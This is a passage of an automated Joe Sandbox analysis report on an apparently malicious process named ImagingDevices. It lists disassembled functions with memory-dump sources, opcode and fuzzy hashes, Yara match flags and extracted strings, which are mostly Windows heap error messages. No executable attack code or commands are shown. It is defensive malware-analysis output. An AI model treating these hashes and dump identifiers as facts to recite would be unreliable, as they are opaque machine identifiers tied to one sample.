                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: b36978d232261a1ec9b060a134a60b97b25a5a918b450ed8ccefd646cc5fb115
                                                                                                  • Instruction ID: d53991855dbfea78b568517926876e7153182fb92e096b097be0cd518f866034
                                                                                                  • Opcode Fuzzy Hash: b36978d232261a1ec9b060a134a60b97b25a5a918b450ed8ccefd646cc5fb115
                                                                                                  • Instruction Fuzzy Hash: 22A2BE70A04259CFDF29DF69C480BA9BBB1FF45304F28819AE886DB355D730AD81DB51
                                                                                                  Function 0089C85C Relevance: 4.6, Strings: 3, Instructions: 858COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 008EDC30
                                                                                                  • HEAP: , xrefs: 008EDC1C
                                                                                                  • HEAP[%wZ]: , xrefs: 008EDC0F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                                                                  • API String ID: 0-212623055
                                                                                                  • Opcode ID: cc64a4fb081aab149d33dec8d527b113b1b38c57b6608ef770904c1951e495b0
                                                                                                  • Instruction ID: b6f0694cffab4d5d3ea15fd4f72a14cc11a7a707b8bf0edf7f505cbbb8db0d5e
                                                                                                  • Opcode Fuzzy Hash: cc64a4fb081aab149d33dec8d527b113b1b38c57b6608ef770904c1951e495b0
                                                                                                  • Instruction Fuzzy Hash: 6072DD71A002999FDF25DF69C840BBDBBF0FF09314F188059E896EB292D335A945DB60
                                                                                                  Function 008929B2 Relevance: 4.6, Strings: 3, Instructions: 851COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: c8c64136587d1a43a049c424e89962d9ef0c37344b53bf71efc47911069173ad
                                                                                                  • Instruction ID: 5e2a92eee929bd657140d72a022f37caf20db1ac376bd93fdb8db801af9ddc88
                                                                                                  • Opcode Fuzzy Hash: c8c64136587d1a43a049c424e89962d9ef0c37344b53bf71efc47911069173ad
                                                                                                  • Instruction Fuzzy Hash: 9E72AB7060025ADFDB28DF19C490ABAB7B1FF46714F1980AAE886CB356D770ED41CB91
                                                                                                  Function 0089CD5B Relevance: 4.2, Strings: 3, Instructions: 478COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 008ED65A
                                                                                                  • HEAP: , xrefs: 008ED646
                                                                                                  • HEAP[%wZ]: , xrefs: 008ED639
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: 9c74a3b8fb92716de5db25fa717cae8e18635534fa29f084d3219378e963dd64
                                                                                                  • Instruction ID: 8d12d1aae17ae17160d4d0ef17a1d3edde0647e4885aaac566f331631ca79bcf
                                                                                                  • Opcode Fuzzy Hash: 9c74a3b8fb92716de5db25fa717cae8e18635534fa29f084d3219378e963dd64
                                                                                                  • Instruction Fuzzy Hash: A802BB70600249DFCB28DF29C491ABABBA1FF55304F18845EE896CB286D735E954DBA0
                                                                                                  Function 008B63DB Relevance: 4.1, Strings: 3, Instructions: 340COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • HEAP: , xrefs: 008E9623
                                                                                                  • HEAP[%wZ]: , xrefs: 008E9616
                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 008E9636
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                                                                  • API String ID: 0-385592399
                                                                                                  • Opcode ID: eb139e48cedb62ddecf0828597a16f7222efecbd70adfdfd13d2e73fe3b4a309
                                                                                                  • Instruction ID: 86e395b75b50eb6eebbc321a31bf4c67c089bc80ff562b69f037aca93fd25f0d
                                                                                                  • Opcode Fuzzy Hash: eb139e48cedb62ddecf0828597a16f7222efecbd70adfdfd13d2e73fe3b4a309
                                                                                                  • Instruction Fuzzy Hash: 96D1CD71A0065ADFDB24CB69C480BBAB7F0FB49304F188199E551DB385E738ED61DB50
                                                                                                  Function 008A1489 Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 008F2D1F
                                                                                                  • HEAP: , xrefs: 008F2D14
                                                                                                  • HEAP[%wZ]: , xrefs: 008F2D07
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                  • API String ID: 0-1596344177
                                                                                                  • Opcode ID: 7c5ef6d0d6a8b2be0edde7f5fe8225be7d4e369f3ce0d975bf33056e8a3e23c2
                                                                                                  • Instruction ID: 923fa91884ab739f8ac40832dab286ab55674ea74f564a9723cd0e8114bf3a3a
                                                                                                  • Opcode Fuzzy Hash: 7c5ef6d0d6a8b2be0edde7f5fe8225be7d4e369f3ce0d975bf33056e8a3e23c2
                                                                                                  • Instruction Fuzzy Hash: F1B19C7160060ACFDB28CF28C494A79B7F1FF49315F1586A9E866CBB92D730E980DB50
                                                                                                  Function 0091579A Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Heap block at %p modified at %p past requested size of %lx, xrefs: 009158F7
                                                                                                  • HEAP: , xrefs: 009158E4
                                                                                                  • HEAP[%wZ]: , xrefs: 009158D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                                                                  • API String ID: 0-3722492067
                                                                                                  • Opcode ID: 6efc3fdcf3ca06c67a9f1debcbf50bb2615130285867c5c2f9cb8ffe601b3b69
                                                                                                  • Instruction ID: 843bf25f30fa4fdaa05e21f50e807acb792888641a59dcc377400ab191b54db4
                                                                                                  • Opcode Fuzzy Hash: 6efc3fdcf3ca06c67a9f1debcbf50bb2615130285867c5c2f9cb8ffe601b3b69
                                                                                                  • Instruction Fuzzy Hash: 7941F375310918DFD3609E19C841AF273E5EF84750B978899F8D6CB282D729D886EB60
                                                                                                  Function 00943A83 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *.*$MUI
                                                                                                  • API String ID: 0-3752369296
                                                                                                  • Opcode ID: a346e8251f37367d2682038a8a3f3f24818dd7758287a5f5a542c24f5d4a1d86
                                                                                                  • Instruction ID: 3bfeefe65dd241f0221e4052f924f9d616302914dc1c15e1c748e67914b9a85e
                                                                                                  • Opcode Fuzzy Hash: a346e8251f37367d2682038a8a3f3f24818dd7758287a5f5a542c24f5d4a1d86
                                                                                                  • Instruction Fuzzy Hash: 7EC14D359056289ACB71DB28CC89BAAB7B8EF49300F0485D9E449E7290EB749FC4CB51
                                                                                                  Function 00916BCB Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $
                                                                                                  • API String ID: 0-227171996
                                                                                                  • Opcode ID: eceeb7d5a1c837f975b608e4b23f623f79ffd4885533c1e23aee20dd00f88500
                                                                                                  • Instruction ID: 7c6f1de56e9fb79e418bb21100cb03eeec3b4a12bdf46780e1d81190e19a2685
                                                                                                  • Opcode Fuzzy Hash: eceeb7d5a1c837f975b608e4b23f623f79ffd4885533c1e23aee20dd00f88500
                                                                                                  • Instruction Fuzzy Hash: B591B336F0011D9BDF28CE69C8805ED7766EB88315F15822DD996EB2C4DA30ADD1CBC0
                                                                                                  Function 00402540 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: gfff$5
                                                                                                  • API String ID: 0-2378412342
                                                                                                  • Opcode ID: 03c4e93064c4532c40853de24b5cb0ba8c2d2c50cefa4c4b42e7d3fe4d0dfa0a
                                                                                                  • Instruction ID: b254ead2f70ff05c4ca95bea672f00786efe20d4242266215361b3ec0c4ae818
                                                                                                  • Opcode Fuzzy Hash: 03c4e93064c4532c40853de24b5cb0ba8c2d2c50cefa4c4b42e7d3fe4d0dfa0a
                                                                                                  • Instruction Fuzzy Hash: FE613631B005069BCB1C8E5DDD9426AB392EBE4314F08857BE919EF7C1E6B9AD118784
                                                                                                  Function 008CD47D Relevance: 2.4, Strings: 1, Instructions: 1138COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: d60ff3c398623b5fe92665ffb1b1b75d05eaad87a01b78530ef6d22d6faba56e
                                                                                                  • Instruction ID: 9633b06d203f317187b6df22d6516e798f7fe7814a9d39d9362a4f71b6c61154
                                                                                                  • Opcode Fuzzy Hash: d60ff3c398623b5fe92665ffb1b1b75d05eaad87a01b78530ef6d22d6faba56e
                                                                                                  • Instruction Fuzzy Hash: 59A22272900269DEEF219F18CC81BE9BBB5FB05304F1481EAE64DE7241DA749E84DF52
                                                                                                  Function 008A69FE Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8@8
                                                                                                  • API String ID: 0-222468769
                                                                                                  • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                                                                  • Instruction ID: f16fbfca8bf7bcc5b845c3e42e3092f41cfbda47a9e1ef6548e4bf1564e9dc93
                                                                                                  • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                                                                  • Instruction Fuzzy Hash: 18F17E71A00259EBEF11CFA4C880BAEBBB4FF05714F18846AE851EB695E370D991CB51
                                                                                                  Function 0041690E Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (
                                                                                                  • API String ID: 0-3887548279
                                                                                                  • Opcode ID: 07ffc702e4d5e6b7ce3c11456118c455fd66311e6514b3dea6c48e72fbafb44f
                                                                                                  • Instruction ID: 615f6a899e0bae73d52e6a42c0a197a28b9bc9604d11ed56b2452be756d5b1fa
                                                                                                  • Opcode Fuzzy Hash: 07ffc702e4d5e6b7ce3c11456118c455fd66311e6514b3dea6c48e72fbafb44f
                                                                                                  • Instruction Fuzzy Hash: 2A021EB6E006199FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                                  Function 00416913 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (
                                                                                                  • API String ID: 0-3887548279
                                                                                                  • Opcode ID: 1dd66c096b851a51b8413e28e8fb3aed5635f58654a3c53898ffc8b00bc8d826
                                                                                                  • Instruction ID: 3954aa7d32d428b9762f81bcb736ea377a8b7a086c31a9d61749043a559176f4
                                                                                                  • Opcode Fuzzy Hash: 1dd66c096b851a51b8413e28e8fb3aed5635f58654a3c53898ffc8b00bc8d826
                                                                                                  • Instruction Fuzzy Hash: 8E021FB6E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                                                                  Function 0090D06D Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aullrem
                                                                                                  • String ID:
                                                                                                  • API String ID: 3758378126-0
                                                                                                  • Opcode ID: 118b915d8d39fe5a3853412fcca9ae1a65cfd75d6746d980f0933ae7f5a1e435
                                                                                                  • Instruction ID: e96741796e8c02cc307158115964faac267195a79ca436e2cb2b3cb6dd422275
                                                                                                  • Opcode Fuzzy Hash: 118b915d8d39fe5a3853412fcca9ae1a65cfd75d6746d980f0933ae7f5a1e435
                                                                                                  • Instruction Fuzzy Hash: 24513F72E1151A9FCF18CFA8C8916BEF7B1BF48310F248529D525E7241D734AA45CBA4
                                                                                                  Function 008BDF7C Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: ae9d401d0c1b5dbaffb79ec373802d2677b0c59707c212d676974331855c03d7
                                                                                                  • Instruction ID: b9f3431bb5c5ef2412bfd674a6d806256cce9a1faa945e1980773b2f7ca3ff72
                                                                                                  • Opcode Fuzzy Hash: ae9d401d0c1b5dbaffb79ec373802d2677b0c59707c212d676974331855c03d7
                                                                                                  • Instruction Fuzzy Hash: 4ED11F31D0421EEFDF28DEA9C5846FEBBB1FB45305F24812AD912E6341D7749E829B81
                                                                                                  Function 008C57C3 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
